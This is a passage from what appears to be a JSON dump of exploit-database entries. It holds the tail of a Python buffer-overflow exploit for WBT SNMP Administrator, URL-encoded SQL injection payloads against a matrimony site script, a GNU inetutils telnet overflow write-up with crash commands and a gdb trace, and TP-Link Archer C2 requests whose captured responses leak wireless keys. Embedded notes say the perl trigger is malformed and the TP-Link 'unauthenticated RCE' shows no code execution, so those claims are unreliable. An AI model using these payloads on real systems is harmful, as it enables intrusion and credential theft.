s.connect((IP, 987))\r\n s.send(payload)\r\n print \"CVE-2019-13577 - 
WBT SNMP Administrator Buffer Overflow 0day.\"\r\n print \"hyp3rlinx\"\r\n s.close()\r\n except Exception as e:\r\n print str(e)\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-i\", \"--ipaddress\", help=\"IP of Target CVE-2019-13577\")\r\n return parser.parse_args()\r\n\r\ndef main(args):\r\n doit(args.ipaddress,payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if not len(sys.argv) > 1:\r\n print \"[*] No args supplied see Help -h\"\r\n exit()\r\n main(parse_args())\r\n\r\n\r\n\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=THMqueCIrFw\r\n\r\n\r\n[Network Access]\r\nRemote\r\n\r\n\r\n[Severity]\r\nHigh\r\n\r\n\r\n[Disclosure Timeline]\r\nVendor Notification: July 10, 2019\r\nSecond vendor notification attempt: July 13, 2019\r\nNo vendor replies.\r\nJuly 17, 2019 : Public Disclosure\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. 
All content (c).\r\n\r\nhyp3rlinx\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32998"}, {"lastseen": "2019-03-26T01:13:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "1337DAY-ID-32411", "href": "https://0day.today/exploit/description/32411", "title": "Matri4Web Matrimony Web Script SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Matrimony Website Script - Multiple SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: https://www.matri4web.com\r\n# Demo Site: https://www.matrimonydemo.com\r\n# Version: M-Plus\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/simplesearch_results.php\r\nVulnerable Parameter: txtGender (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/advsearch_results.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nage1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 3 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/specialcase_results.php\r\nVulnerable Parameter: Fage\r\nAttack Pattern:\r\nFage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'\"%2B(select(0)from(select(sleep(0)))v)%2B\"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7\r\n\r\n----- PoC 4 - SQLi -----\r\n\r\nRequest: 
http://localhost/[PATH]/locational_results.php\r\nVulnerable Parameter: cboCountry (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 5 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/registration2.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nEMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1\n\n# 0day.today [2019-03-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32411"}, {"lastseen": "2018-12-24T20:31:21", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2018-12-17T00:00:00", "published": "2018-12-17T00:00:00", "id": "1337DAY-ID-31805", "href": "https://0day.today/exploit/description/31805", "title": "GNU inetutils < 1.9.4 - (telnet.c) Multiple Overflows Exploit", "type": "zdt", "sourceData": "GNU inetutils <= 1.9.4 telnet.c multiple overflows\r\n==================================================\r\nGNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment \r\nvariable handling which can be exploited to escape restricted shells on embedded devices. \r\nMost modern browsers no longer support telnet:// handlers, but in instances where URI\r\nhandlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. 
\r\nA stack-based overflow is present in the handling of environment variables when connecting \r\ntelnet.c to remote telnet servers through oversized DISPLAY arguments.\r\n\r\nA heap-overflow is also present which can be triggered in a different code path due to \r\nsupplying oversized environment variables during client connection code. \r\n\r\nThe stack-based overflow can be seen in the following code snippet from the latest inetutils \r\nrelease dated 2015.\r\n\r\ninetutils-telnet/inetutils-1.9.4/telnet/telnet.c\r\n\r\n983- case TELOPT_XDISPLOC:\r\n984- if (my_want_state_is_wont (TELOPT_XDISPLOC))\r\n985-\treturn;\r\n986- if (SB_EOF ())\r\n987-\treturn;\r\n988- if (SB_GET () == TELQUAL_SEND)\r\n989-\t{\r\n990-\t unsigned char temp[50], *dp;\r\n991-\t int len;\r\n992-\r\n993-\t if ((dp = env_getvalue (\"DISPLAY\")) == NULL)\r\n994-\t {\r\n995-\t /*\r\n996-\t * Something happened, we no longer have a DISPLAY\r\n997-\t * variable. So, turn off the option.\r\n998-\t */\r\n999-\t send_wont (TELOPT_XDISPLOC, 1);\r\n1000-\t break;\r\n1001-\t }\r\n1002:\t sprintf ((char *) temp, \"%c%c%c%c%s%c%c\", IAC, SB, TELOPT_XDISPLOC,\r\n1003-\t\t TELQUAL_IS, dp, IAC, SE);\r\n1004-\t len = strlen ((char *) temp + 4) + 4;\t/* temp[3] is 0 ... */\r\n1005-\r\n1006-\t if (len < NETROOM ())\r\n\r\nWhen a telnet server requests environment options the sprintf on line 1002 will\r\nnot perform bounds checking and causes an overflow of stack buffer temp[50] defined\r\nat line 990. 
This issue can be trivially fixed using a patch to add bounds checking\r\nto sprintf such as with a call to snprintf(); \r\n\r\nAn example of the heap overflow can be seen when handling large environment\r\nvariables within the telnet client, causing heap buffer memory corruption\r\nthrough a long string supplied in, for example, USER or DISPLAY.\r\n\r\nAn example of triggering this issue on inetutils in Arch Linux can be seen below:\r\n\r\nDISPLAY=`perl -e 'print Ax\"50000\"'` telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\nAborted (core dumped)\r\n\r\nNote: as written, perl treats Ax in 'print Ax\"50000\"' as a filehandle name, so DISPLAY is effectively empty in this command; the realloc() abort is reproduced by the oversized -l username alone, as the gdb trace below shows. Use perl -e 'print \"A\"x50000' for DISPLAY to actually exercise the TELOPT_XDISPLOC stack path.\r\n\r\nThese issues are present anywhere that inetutils is used as a base for clients\r\nsuch as in common embedded home routers or networking equipment. An attacker\r\ncan potentially exploit these vulnerabilities to gain arbitrary code execution\r\non platforms where telnet commands are available. An example debug trace of the\r\nheap overflow can be found below:\r\n\r\n(gdb) run -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nStarting program: /usr/bin/telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\n\r\nProgram received signal SIGABRT, Aborted.\r\n0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n(gdb) bt\r\n#0 0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n#1 0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6\r\n#2 0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6\r\n#3 0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6\r\n#4 0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6\r\n#5 0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6\r\n#6 0x000055555556029c in ?? ()\r\n#7 0x0000555555560116 in ?? ()\r\n#8 0x000055555556049f in ?? ()\r\n#9 0x00005555555606b7 in ?? ()\r\n#10 0x00005555555616de in ?? 
()\r\n#11 0x0000555555561b8d in ?? ()\r\n#12 0x0000555555562122 in ?? ()\r\n#13 0x000055555555c6f4 in ?? ()\r\n#14 0x00005555555591e7 in ?? ()\r\n#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6\r\n#16 0x00005555555592be in ?? ()\r\n\r\nDue to the various devices embedding telnet from inetutils and distributions\r\nsuch as Arch Linux using inetutils telnet, the full impact and all scenarios\r\nwhere this issue could be leveraged are unclear. An attacker may seek to exploit\r\nthese vulnerabilities to escape restricted shells.\r\n\r\n-- Hacker Fantastic (11/12/2018)\r\n\r\nhttps://hacker.house\n\n# 0day.today [2018-12-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31805"}, {"lastseen": "2018-07-24T02:13:58", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-23T00:00:00", "published": "2018-07-23T00:00:00", "id": "1337DAY-ID-30759", "href": "https://0day.today/exploit/description/30759", "title": "TP-Link Archer C2 v3.0 UnAuthenticated Remote Code Execution Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: [UnAuthenticated Remote Code Execution at TP-Link Archer C2 Router]\r\n# Date: [17.07.2018] \r\n# Exploit Author: [Ismail Tasdelen]\r\n# Vendor Homepage: [https://www.tp-link.com/]\r\n# Hardware Link : [https://www.tp-link.com/la/products/details/cat-9_Archer-C2.html]\r\n# Hardware Version : [Archer C2 v3.0]\r\n# Firmware Version : [3.0.0 Build 20160713 Rel. 74035(EU)]\r\n# Vulnerability Type : [RCE - Remote Code Execution]\r\n# Vulnerability : [UnAuthenticated Remote Code Execution]\r\n# Risk : [High]\r\n\r\n# Description : What is a remote code execution vulnerability?\r\n\r\nVulnerabilities can provide an attacker with the ability to execute malicious code and take complete control of an affected system with the privileges of the user running the application. 
Remote code execution can be best described as an action which involves an attacker executing code remotely using system vulnerabilities. Such code can run from a remote server, which means that the attack can originate from anywhere around the world giving the attacker access to the PC. Once a hacker gains access to a system, they\u2019ll be able to make changes within the target computer. The attacker leverages the user\u2019s admin privileges to allow them to execute code and make further changes to the computer. It\u2019s often the case that such user privileges become elevated. Attackers usually look to gain further control on the system they already have a grip on and look to exert control onto other computers on the same network.\r\n\r\n# POC:\r\n\r\n# Note: the requests below carry a stok token in the URL and a sysauth cookie, i.e. they were captured from an already authenticated browser session, and the responses shown return configuration data (including wireless PSKs) rather than demonstrating command execution; an unauthenticated path to code execution is not shown in this PoC.\r\n\r\n# cURL Request :\r\n\r\ncurl 'http://198.168.0.1:8081/cgi-bin/luci/;stok=78c53e5bb36166c34245a44bd99edd59/admin/ledgeneral?form=setting' -H 'Host: 198.168.0.1:8081' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://198.168.0.1:8081/webpages/index.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: sysauth=50e6c4175557343bb0aac91fa2e0ce7f' -H 'Connection: keep-alive' --data 'operation=write'\r\n\r\n# HTTP Request :\r\n\r\nPOST /cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting HTTP/1.1\r\nHost: 198.168.0.1:8081\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://198.168.0.1:8081/webpages/index.html\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 15\r\nCookie: 
sysauth=e3638eb1f1952c2a56bd50f466603048\r\nConnection: keep-alive\r\n\r\n# HTTP Response :\r\n\r\nHTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: application/json\r\nCache-Control: no-cache\r\nExpires: 0\r\n\r\nJSON Data :\r\n\r\n{\r\n \"log\": {\r\n \"version\": \"1.1\",\r\n \"creator\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"browser\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"pages\": [\r\n {\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"id\": \"page_1\",\r\n \"title\": \"Wireless Router Archer C2\",\r\n \"pageTimings\": {\r\n \"onContentLoad\": -1,\r\n \"onLoad\": -1\r\n }\r\n }\r\n ],\r\n \"entries\": [\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"time\": 930,\r\n \"request\": {\r\n \"bodySize\": 15,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"15\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": 
\"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"setting\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=write\"\r\n },\r\n \"headersSize\": 577\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 79,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"enable\\\":\\\"off\\\",\\\"time_set\\\":\\\"yes\\\",\\\"ledpm_support\\\":\\\"yes\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 79\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 0,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 922,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.652+03:00\",\r\n \"time\": 987,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n 
{\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": 
\"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wirele
ss_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_
Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\
